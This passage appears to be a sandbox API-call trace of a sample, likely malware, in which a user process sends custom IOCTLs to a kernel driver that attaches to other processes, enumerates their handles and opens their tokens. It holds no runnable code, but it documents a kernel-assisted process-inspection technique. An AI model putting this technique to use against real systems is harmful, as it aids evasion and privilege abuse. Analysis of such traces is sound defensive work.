lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0247.576] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.576] PsAcquireProcessExitSynchronization () returned 0x0 [0247.576] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0) [0247.576] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002687680, HandleInformation=0x0) returned 0x0 [0247.576] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.576] PsReleaseProcessExitSynchronization () returned 0x2 [0247.576] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x27 [0247.576] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.576] ObfDereferenceObject (Object=0xfffffa8002687680) returned 0x1 [0247.576] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.576] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.576] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.576] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.576] PsAcquireProcessExitSynchronization () returned 0x0 [0247.576] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0) [0247.576] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0247.576] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.576] PsReleaseProcessExitSynchronization () returned 0x2 [0247.577] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x27 [0247.577] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.577] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0247.577] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.577] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.577] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0247.577] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.577] PsAcquireProcessExitSynchronization () returned 0x0 [0247.577] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0) [0247.577] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800286ddd0, HandleInformation=0x0) returned 0x0 [0247.577] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.577] PsReleaseProcessExitSynchronization () returned 0x2 [0247.577] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x27 [0247.577] ObQueryNameString (in: Object=0xfffffa800286ddd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.577] ObfDereferenceObject (Object=0xfffffa800286ddd0) returned 0x1 [0247.577] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.577] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.577] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0247.577] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.577] PsAcquireProcessExitSynchronization () returned 0x0 [0247.577] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0) [0247.578] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80025e9bb0, HandleInformation=0x0) returned 0x0 [0247.578] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.578] PsReleaseProcessExitSynchronization () returned 0x2 [0247.578] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x27 [0247.578] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.578] ObfDereferenceObject (Object=0xfffffa80025e9bb0) returned 0x1 [0247.578] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.578] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.578] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.578] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.578] PsAcquireProcessExitSynchronization () returned 0x0 [0247.578] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0) [0247.578] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a002ff14a0, HandleInformation=0x0) returned 0x0 [0247.578] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.578] PsReleaseProcessExitSynchronization () returned 0x2 [0247.578] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x27 [0247.578] ObQueryNameString (in: Object=0xfffff8a002ff14a0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.578] ObfDereferenceObject (Object=0xfffff8a002ff14a0) returned 0x1 [0247.578] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.578] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.578] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0247.578] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.578] PsAcquireProcessExitSynchronization () returned 0x0 [0247.578] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0) [0247.579] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80022fe240, HandleInformation=0x0) returned 0x0 [0247.579] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.579] PsReleaseProcessExitSynchronization () returned 0x2 [0247.579] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x27 [0247.579] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.579] ObfDereferenceObject (Object=0xfffffa80022fe240) returned 0x1 [0247.579] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.579] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.579] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.579] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.579] PsAcquireProcessExitSynchronization () returned 0x0 [0247.579] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880053c85d0) [0247.579] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0247.579] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.579] PsReleaseProcessExitSynchronization () returned 0x2 [0247.579] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x27 [0247.579] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.579] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xa [0247.579] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.579] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xab8) returned 0x0 [0247.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.580] PsLookupProcessByProcessId (in: ProcessId=0xab8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.580] PsLookupProcessByProcessId (in: ProcessId=0xab8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.580] PsLookupProcessByProcessId (in: ProcessId=0xab8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0247.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.580] PsLookupProcessByProcessId (in: ProcessId=0x150, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.581] PsLookupProcessByProcessId (in: ProcessId=0x150, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.581] PsLookupProcessByProcessId (in: ProcessId=0x150, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.581] PsLookupProcessByProcessId (in: ProcessId=0x150, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.581] PsLookupProcessByProcessId (in: ProcessId=0x150, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.581] PsLookupProcessByProcessId (in: ProcessId=0x150, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.582] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.582] PsLookupProcessByProcessId (in: ProcessId=0x150, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.582] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xac8) returned 0xc8 [0247.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.582] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001eeb5c0, HandleInformation=0x0) returned 0x0 [0247.582] ObOpenObjectByPointer (in: Object=0xfffffa8001eeb5c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0247.582] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x10 [0247.582] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002545e80 | out: TokenHandle=0xfffffa8002545e80*=0xc4) returned 0x0 [0247.582] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0247.582] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.582] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.582] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.584] CloseHandle (hObject=0xc4) returned 1 [0247.584] CloseHandle (hObject=0xc8) returned 1 [0247.584] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0247.584] PsLookupProcessByProcessId (in: ProcessId=0xac8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.584] PsAcquireProcessExitSynchronization () returned 0x0 [0247.584] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880053c85d0) [0247.584] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80025857d0, HandleInformation=0x0) returned 0x0 [0247.584] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.584] PsReleaseProcessExitSynchronization () returned 0x2 [0247.584] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0xe [0247.584] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.584] ObfDereferenceObject (Object=0xfffffa80025857d0) returned 0x1 [0247.584] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.584] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.584] PsLookupProcessByProcessId (in: ProcessId=0xac8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.585] PsAcquireProcessExitSynchronization () returned 0x0 [0247.585] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880053c85d0) [0247.585] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f7e900, HandleInformation=0x0) returned 0x0 [0247.585] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.585] PsReleaseProcessExitSynchronization () returned 0x2 [0247.585] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0xe [0247.585] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.585] ObfDereferenceObject (Object=0xfffffa8001f7e900) returned 0x1 [0247.585] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.585] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.585] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0247.585] PsLookupProcessByProcessId (in: ProcessId=0xac8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.585] PsAcquireProcessExitSynchronization () returned 0x0 [0247.585] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880053c85d0) [0247.585] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80026484e0, HandleInformation=0x0) returned 0x0 [0247.585] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.585] PsReleaseProcessExitSynchronization () returned 0x2 [0247.585] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 